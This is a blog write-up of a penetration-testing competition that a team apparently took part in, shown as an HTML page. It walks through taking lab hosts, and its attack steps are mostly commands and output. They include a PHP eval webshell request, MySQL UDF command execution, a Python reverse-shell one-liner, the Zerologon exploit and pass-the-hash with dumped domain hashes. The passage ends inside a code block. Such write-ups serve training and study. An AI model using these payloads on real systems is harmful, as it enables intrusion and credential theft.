<!DOCTYPE html>
<html>
  
<head>
  <meta charset="utf-8">
  <meta name="author" content="Suers" />
  
  
  <title>2023 贵阳大数据网络安全精英对抗赛 SU Writeup | TEAM-SU</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="渗透," />
  

  
  <meta name="description" content="本次比赛分为2天渗透，比赛时间为5月17日和5月18日，我们取得了4th的好成绩，因为很多是赛后复现加上渗透比赛没啥附件，所以有一些内容会有一些差异。">

  

  

  
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" async></script>
  

  

  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"Hyq9wkH495DgNHWhDQCOfQSp-gzGzoHsz","appkey":"WaR7nrzhliHj9aVwdQzkdlGd","comment":false,"count":false},
    welcome: {"enable":false,"interval":30},
    start_time: "2018-02-10",
    passwords: ["efe07af7441da2b69c4a41e42e73be4db47f66010a56900788a458354a7373ec", ],
    is_post: true,
    lock: false,
    author: "Suers",
    share: {"twitter":false,"facebook":false,"weibo":false,"qq":false,"wechat":false},
    mathjax: true,
    page_type: "",
    root: "/"
  };
</script>

  
<script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>


  
    <link rel="icon" href="/images/SU.ico">
    <link rel="apple-touch-icon" href="/images/SU.png">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  
<link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">


  
<meta name="generator" content="Hexo 5.0.0"></head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">SU</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | Write ups of TEAM-SU</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/tags/" target="_self">标签</a>
      
        <a href="/categories/" target="_self">分类</a>
      
        <a href="/about/" target="_self">关于</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/team-su/" target="_blank" id="site-github">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
      <a href="javascript:void(0);" id="site-nav-btn">
        <i class="fa fa-ellipsis-v"></i>
      </a>
    </div>
  </div>
</header>
<nav class="table-content" id="site-nav">
  <div class="table-content-title">
    <span>导航</span>
  </div>
  <div class="table-content-main">
    <ol class="toc">
      
        <li class="toc-item">
          <a href="/" target="_self">
            首页
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/archives/" target="_self">
            归档
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/tags/" target="_self">
            标签
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/categories/" target="_self">
            分类
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/about/" target="_self">
            关于
          </a>
        </li>
      
    </ol>
  </div>
</nav>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2023-08-24
    </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    2023 贵阳大数据网络安全精英对抗赛 SU Writeup
  </h1>
  
  <article class="passage-article">
    <hr>
<p>本次比赛分为2天渗透，比赛时间为5月17日和5月18日，我们取得了4th名的好成绩，因为很多是赛后回忆加上渗透比赛没啥附件，所以有一些内容会有一些差异。</p>
<p>本次比赛网络拓扑也很简单，就是直接的3层<br>dmz区（172.30.x.x）-&gt;内网区(192.168.20.x)-&gt;核心内网区(192.168.30.x) ,因为基本上跳板的机子都是双网卡，所以搭建代理和隧道非常简单，不做过多描述，题目质量还是不错的。</p>
<h2 id="2023-05-17-day1"><a href="#2023-05-17-day1" class="headerlink" title="2023 05 17 day1"></a>2023 05 17 day1</h2><h2 id="1、DMZ区"><a href="#1、DMZ区" class="headerlink" title="1、DMZ区"></a>1、DMZ区</h2><h3 id="入口1：172-30-38-150-80-bluecms"><a href="#入口1：172-30-38-150-80-bluecms" class="headerlink" title="入口1：172.30.38.150:80 bluecms"></a>入口1：172.30.38.150:80 bluecms</h3><p>bluecms后台：<a target="_blank" rel="noopener" href="http://172.30.38.150/admin/">http://172.30.38.150/admin/</a><br>账号密码 admin admin666<br>后台系统管理-&gt;模板管理处获编译htm文件，修改为php，burp包如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;admin&#x2F;tpl_manage.php HTTP&#x2F;1.1</span><br><span class="line">Host: 172.30.38.150</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">Content-Length: 108</span><br><span class="line">Origin: http:&#x2F;&#x2F;172.30.38.150</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http:&#x2F;&#x2F;172.30.38.150&#x2F;admin&#x2F;tpl_manage.php?act&#x3D;edit&amp;tpl_name&#x3D;search.htm</span><br><span class="line">Cookie: PHPSESSID&#x3D;rkiacm3stpb4c9vpj0cp8cfo67</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">tpl_content&#x3D;%3C%3Fphp+echo+123%3B%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&amp;tpl_name&#x3D;..&#x2F;shell.php&amp;act&#x3D;do_edit</span><br></pre></td></tr></table></figure><br>获取权限，蚁剑连接，根目录下有flag.txt<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;9130db0c-c67b-4cee-a9a1-a79c34efc079&#125;</span><br></pre></td></tr></table></figure><br>同时找/var/www/html/data/config.php看到了关于数据库账号密码相关信息<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$dbhost   &#x3D; &quot;127.0.0.1&quot;; &#x2F;&#x2F;dmz-db</span><br><span class="line">$dbname   &#x3D; &quot;bluecms&quot;;</span><br><span class="line">$dbuser   &#x3D; &quot;root&quot;;</span><br><span class="line">$dbpass   &#x3D; &quot;root&quot;; &#x2F;&#x2F; root-gzdb123</span><br></pre></td></tr></table></figure><br>但是这里的数据库是本地的，我们第二个靶标与该ip并不是一个，但是既然给了hint，猜测是同一个密码</p>
<h3 id="入口2：172-30-38-151-3306"><a href="#入口2：172-30-38-151-3306" class="headerlink" title="入口2：172.30.38.151:3306"></a>入口2：172.30.38.151:3306</h3><p>根据入口1获取的数据库的密码，连接上了数据库，但是数据库中没有数据，尝试提权，试了几种发现udf可以，在国光师傅的博客 <a target="_blank" rel="noopener" href="https://sqlsec.com/udf/">https://sqlsec.com/udf/</a><br>上复制dll的exp下来，然后执行命令获取权限，整体过程如下<br>hex太大 这里缩写为0x4d5a900003….<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">MySQL [(none)]&gt; select @@plugin_dir;</span><br><span class="line">+----------------------------------------------------+</span><br><span class="line">| @@plugin_dir                                       |</span><br><span class="line">+----------------------------------------------------+</span><br><span class="line">| C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ |</span><br><span class="line">+----------------------------------------------------+</span><br><span class="line">1 row in set (0.003 sec)</span><br><span class="line"></span><br><span class="line">MySQL [(none)]&gt; SELECT 0x4d5a900003 INTO DUMPFILE &#39;C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\\plugin\\udf.dll&#39;;</span><br><span class="line">MySQL [(none)]&gt; create function sys_eval returns string soname &#39;udf.dll&#39;;</span><br><span class="line">MySQL [(none)]&gt; select sys_eval(&quot;whoami&quot;);</span><br><span class="line">+---------------------+</span><br><span class="line">| sys_eval(&quot;whoami&quot;)  |</span><br><span class="line">+---------------------+</span><br><span class="line">| nt authority\system |</span><br><span class="line">+---------------------+</span><br><span class="line">1 row in set (0.042 sec)</span><br><span class="line">然后一步步翻flag</span><br><span class="line">MySQL [(none)]&gt; select sys_eval(&#39;type C:\\users\\Administrator\\Desktop\\flag.txt&#39;);</span><br><span class="line">+--------------------------------------------------------------+</span><br><span class="line">| sys_eval(&#39;type C:\\users\\Administrator\\Desktop\\flag.txt&#39;) |</span><br><span class="line">+--------------------------------------------------------------+</span><br><span class="line">| flag&#123;522a6ec2-b101-4bae-b2fd-3e0582096a37                    |</span><br><span class="line">+--------------------------------------------------------------+</span><br><span class="line">1 row in set (0.030 sec)</span><br></pre></td></tr></table></figure></p>
<h2 id="2、内网区"><a href="#2、内网区" class="headerlink" title="2、内网区"></a>2、内网区</h2><p>DMZ区拿下了一台linux 一台windows ，选择用linux挂代理<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">linux:</span><br><span class="line">.&#x2F;gost -L&#x3D;socks5:&#x2F;&#x2F;:7777</span><br><span class="line">.&#x2F;gost -L rtcp:&#x2F;&#x2F;0.0.0.0:8888&#x2F;localhost:7777 -F forward+ssh:&#x2F;&#x2F;admin:123456@172.30.38.201:9898?ping&#x3D;30</span><br><span class="line"></span><br><span class="line">本地：</span><br><span class="line">gost-windows-amd64.exe -L forward+ssh:&#x2F;&#x2F;admin:123456@:9898</span><br><span class="line">本地的8888就是内网区的代理了</span><br></pre></td></tr></table></figure></p>
<h3 id="内网区gitlab-192-168-20-19-8080"><a href="#内网区gitlab-192-168-20-19-8080" class="headerlink" title="内网区gitlab:192.168.20.19:8080"></a>内网区gitlab:192.168.20.19:8080</h3><p>先fscan扫描<br><code>./fscan -h 192.168.0.0/16</code><br>网络有点卡，等了一会发现除了DMZ区外只有一个内网服务器<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">192.168.20.19:8080 open</span><br><span class="line">192.168.20.19:22 open</span><br><span class="line">[*] WebTitle:http:&#x2F;&#x2F;192.168.20.19:8080 code:302 len:105    title:None</span><br><span class="line">[*] WebTitle:http:&#x2F;&#x2F;192.168.20.19:8080&#x2F;users&#x2F;sign_in code:200 len:17     title:Sign in · GitLab</span><br><span class="line">[+] InfoScan:http:&#x2F;&#x2F;192.168.20.19:8080&#x2F;users&#x2F;sign_in [GitLab] </span><br><span class="line">[+] http:&#x2F;&#x2F;192.168.20.19:8080 poc-yaml-gitlab-cnvd-2021-14193-infoleak</span><br></pre></td></tr></table></figure><br>网站找gitlab前台rce漏洞，分析了一下，cve-2021-22205可用，github找一个exp打，这里很蛋疼，这个poc是无回显的，而且gitlab不太方便做权限维持（不是php写的），尝试反弹shell，但是内网区是不通本地的ip，只有DMZ区通。<br>所以我使用的方法是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、先将dmz区的linux反弹shell到本地获取一个交互式dmz区的shell</span><br><span class="line">这个dmz区反弹一直报错，最后使用python3反弹的</span><br><span class="line">python3 -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.10.10&quot;,9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;bash&quot;,&quot;-i&quot;]);&#39;</span><br><span class="line">2、在交互式dmz区的shell上 监听nc -lnvp 9090</span><br><span class="line">3、用gitlab的exp 反弹shell到dmz的ip（192.168.10.10）</span><br></pre></td></tr></table></figure></p>
<p>获取了git的权限，flag在根目录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git@60783d084846:~&#x2F;gitlab$ cat &#x2F;flag.txt</span><br><span class="line">flag&#123;b10785ca-a4ff-4cb9-a6d5-50351c248ee3&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="内网区windows-192-168-20-15"><a href="#内网区windows-192-168-20-15" class="headerlink" title="内网区windows:192.168.20.15"></a>内网区windows:192.168.20.15</h3><p>fscan开多了，所以没扫到其他资产，试了很久。然后把fscan进程一个个杀了，降低线程+重新跑了一下20+取消ping。<br>发现了另外一个资产<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">22</span> open</span><br><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>:<span class="number">135</span> open</span><br><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>:<span class="number">139</span> open</span><br><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>:<span class="number">445</span> open</span><br><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">8080</span> open</span><br><span class="line"><span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>:<span class="number">88</span> open</span><br><span class="line">NetInfo:</span><br><span class="line">[*]<span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span></span><br><span class="line">   [-&gt;]DC</span><br><span class="line">   [-&gt;]192.168.20.15</span><br><span class="line">[*] <span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>  (Windows Server <span class="number">2012</span> R2 Datacenter <span class="number">9600</span>)</span><br><span class="line">[*] <span class="number">192.168</span><span class="number">.20</span><span class="number">.15</span>  [+]DC COMPANY\DC                Windows Server <span class="number">2012</span> R2 Datacenter <span class="number">9600</span></span><br><span class="line">[*] WebTitle:http://<span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">8080</span> code:<span class="number">302</span> len:<span class="number">105</span>    title:<span class="literal">None</span></span><br><span class="line">[*] WebTitle:http://<span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">8080</span>/users/sign_in code:<span class="number">200</span> len:<span class="number">17</span>     title:Sign <span class="keyword">in</span> · GitLab</span><br><span class="line">[+] InfoScan:http://<span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">8080</span>/users/sign_in [GitLab] </span><br><span class="line">[+] http://<span class="number">192.168</span><span class="number">.20</span><span class="number">.19</span>:<span class="number">8080</span> poc-yaml-gitlab-cnvd<span class="number">-2021</span><span class="number">-14193</span>-infoleak</span><br><span class="line"></span><br></pre></td></tr></table></figure><br>192.168.20.15是一台裸DC<br>发现存在Zerologon经典漏洞，CVE-2020-1472<br>先挂上192.168.10.10上的代理，github找一个exp,对着网站复现。<br>拿到hash用kali的impacket组件，然后用wmiexec命令执行获取flag,所有过程如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 cve-2020-1472-exploit.py DC 192.168.20.15                                 1 ⨯</span><br><span class="line">[proxychains] config file found: &#x2F;etc&#x2F;proxychains4.conf</span><br><span class="line">[proxychains] preloading &#x2F;usr&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libproxychains.so.4</span><br><span class="line">[proxychains] DLL init: proxychains-ng 4.14</span><br><span class="line">Performing authentication attempts...</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:135  ...  OK</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:49158  ...  OK</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">Target vulnerable, changing account password to empty string</span><br><span class="line"></span><br><span class="line">Result: 0</span><br><span class="line"></span><br><span class="line">Exploit complete!</span><br><span class="line"></span><br><span class="line">─$ proxychains4 python3 secretsdump.py  -hashes :31d6cfe0d16ae931b73c59d7e0c089c0  &quot;company.local&#x2F;DC\$@192.168.20.15&quot;  2 ⨯</span><br><span class="line">[proxychains] config file found: &#x2F;etc&#x2F;proxychains4.conf</span><br><span class="line">[proxychains] preloading &#x2F;usr&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libproxychains.so.4</span><br><span class="line">[proxychains] DLL init: proxychains-ng 4.14</span><br><span class="line">Impacket v0.10.1.dev1 - Copyright 2022 Fortra</span><br><span class="line"></span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:445  ...  OK</span><br><span class="line">[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied </span><br><span class="line">[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</span><br><span class="line">[*] Using the DRSUAPI method to get NTDS.DIT secrets</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:135  ...  OK</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:49155  ...  OK</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:c1cd39bfd103a65a50fe6c7199dab799:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:51103e514e91e837821f6c70b2fcbf3a:::</span><br><span class="line">DC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">[*] Kerberos keys grabbed</span><br><span class="line">krbtgt:aes256-cts-hmac-sha1-96:245e5824adfc248572451cb966eb44fea409149e70713f0b8400069732580b47</span><br><span class="line">krbtgt:aes128-cts-hmac-sha1-96:21fba0c76db699fb80c59730a1bb467c</span><br><span class="line">krbtgt:des-cbc-md5:dace764645ea2646</span><br><span class="line">DC$:aes256-cts-hmac-sha1-96:34c8b93f22c8c95d6c07a1a2bf35dcfae048091233406be6e16f89cdc1865db8</span><br><span class="line">DC$:aes128-cts-hmac-sha1-96:4c0c9af9f667ba964235c2d27b99e3c3</span><br><span class="line">DC$:des-cbc-md5:43d519a4f22ca2a7</span><br><span class="line">[*] Cleaning up... </span><br><span class="line"></span><br><span class="line">└─$ proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c1cd39bfd103a65a50fe6c7199dab799 company.local&#x2F;Administrator@192.168.20.15</span><br><span class="line">[proxychains] config file found: &#x2F;etc&#x2F;proxychains4.conf</span><br><span class="line">[proxychains] preloading &#x2F;usr&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libproxychains.so.4</span><br><span class="line">[proxychains] DLL init: proxychains-ng 4.14</span><br><span class="line">Impacket v0.10.1.dev1 - Copyright 2022 Fortra</span><br><span class="line"></span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:445  ...  OK</span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:135  ...  OK</span><br><span class="line">[proxychains] Strict chain  ...  172.30.38.201:8888  ...  192.168.20.15:49154  ...  OK</span><br><span class="line">[!] Launching semi-interactive shell - Careful what you execute</span><br><span class="line">[!] Press help for extra shell commands</span><br><span class="line">C:\&gt;type C:\Users\Administrator\Desktop\flag.txt</span><br><span class="line">flag&#123;bcbdb15f-fad8-4f18-b9d5-c5ff397bf275&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></p>
<h2 id="3、核心内网区"><a href="#3、核心内网区" class="headerlink" title="3、核心内网区"></a>3、核心内网区</h2><p>总结前面的信息，在内网区的gitlab上跑fscan，获取扫描核心内网的资产<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span 